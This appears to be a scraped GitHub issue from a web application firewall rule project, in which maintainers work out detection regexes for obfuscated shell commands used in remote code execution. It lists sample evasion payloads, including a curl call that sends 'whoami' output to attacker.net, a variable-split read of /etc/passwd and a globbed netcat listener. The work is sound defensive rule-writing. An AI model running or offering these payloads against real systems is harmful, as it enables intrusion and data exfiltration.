Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Shell aliasing and other techniques for RCE

See original GitHub issue

Description

Per reports EBIDJ91T, IXMZUXBG, K7LMFJXP, MKXQCJMX, S9ZC1HN6 and YIYFWRSY we need to be able to check different types of shell aliasing and other techniques to find RCE attempts.

Here are the examples we need to cover:

using variables 1: a=curl&&b=whoami&&$a http://attacker.net/$b
using variables 2: a=/etc&&b=/passwd&&c=cat&&$c $a$b
globbing 1: {n$u\c$u,-nlvp,777}
globbing 2: garb=cur[l];$garb+google.com
vars + spacing: v='u';cu$v\r\l google.com
non-existing vars: cu$@rl

This might need a new rule encompassing all these, or we can complement existing ones.

Issue Analytics

State:
Created a year ago
Reactions:1
Comments:11 (11 by maintainers)

Top GitHub Comments

1reaction

fzipicommented, Oct 30, 2022

For future CRS developers

After thinking of a solution that involved changing the cmdLine processor to get additional coverage for evasions, we ended up with [\x5c'\"\[]*(?:\$[a-z0-9_@?!#{*-]*)?(?:\x5c)?.

This covers the cases below, so we are good:

But.

Yes, there is always one, right? After applying the change, we ended up with rule 932100 being about 32K of text 😕

So we started thinking about this with @theseion, and we came up with the following approach: let’s split the word lists in the length, and be less precise with the matches with more chars, and, instead, try to detect evasion attempts generically. The initial division we are using is 3 (three) chars. So, for the commands with (2,3) two and three chars we take them from the list as is, and we apply the evasion prevention mentioned above. For more than 3 (4 an up), we use a generic matching using something like [a-z0-9][\x5c'\"\[]*(?:\$[a-z0-9_@?!#{*-]*)?(?:\x5c)?{4,10} (10 here is used as example), so we can describe them using a generic approach.

This will end up in:

a new rule for 2 and 3 chars and the evasion technique applied.
a new generic rule for 4 and up chars, up to something reasonable with the evasion added.
we can keep the lists for commands, but they won’t need to have the cmdline applied anymore, if we don’t need to.

0reactions

fzipicommented, Nov 4, 2022

All the techniques mentioned here were addressed.

The changes made for supporting this made me think about taking a second look at the whole techniques we are covering. Creating a follow-up issue.